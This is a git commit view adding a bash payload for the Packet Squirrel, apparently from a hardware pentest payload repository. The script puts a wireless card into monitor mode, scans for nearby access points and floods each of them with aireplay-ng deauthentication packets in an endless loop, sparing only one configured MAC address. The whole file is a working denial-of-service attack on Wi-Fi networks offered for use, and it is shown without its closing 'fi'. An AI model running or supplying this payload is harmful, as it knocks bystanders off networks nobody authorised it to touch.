Update repos for Packet Squirrel Mk 2 release

This commit is contained in:
Mike Kershaw / Dragorn
2023-07-24 14:58:18 -04:00
parent 2181bf89e5
commit d3250b4165
56 changed files with 731 additions and 7 deletions

View File

@@ -0,0 +1,42 @@
#!/bin/bash
# This payload is for the original Packet Squirrel. It may not work on
# the Packet Squirrel Mark II
function scan() {
LED G
ifconfig wlan0 down
iwconfig wlan0 mode managed
ifconfig wlan0 up
AP_LIST=$(iwlist wlan0 scan | grep Address | awk '{ print $5 }')
}
function attack() {
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
LED R
for a in $AP_LIST
do
if [ $a != $YOUR_AP_MAC ]; then
aireplay-ng -0 20 -a $a wlan0
fi
done
LED B
sleep 10
scan
attack
}
if [ ! -f '/usr/sbin/aireplay-ng' ] ; then
LED STAGE1
NETMODE NAT
until ping -c 1 8.8.8.8 >/dev/null ; do : ; done
opkg install aircrack-ng || LED FAIL
LED SETUP
AP_LIST=''
############ You can change this Variable to allow your AP to not be targeted
YOUR_AP_MAC='00:11:22:00:11:22'
scan
attack